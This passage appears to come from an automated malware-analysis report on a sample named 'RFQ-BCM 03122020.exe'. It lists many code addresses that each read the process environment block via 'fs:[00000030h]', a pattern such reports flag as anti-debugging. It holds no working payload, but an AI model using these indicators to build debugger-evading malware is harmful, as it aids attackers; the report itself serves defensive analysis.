          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B94120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C04257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B93A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C48A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B75210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B88A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C223E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C223E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C223E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C2D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C45BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C48B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C48CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C28DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
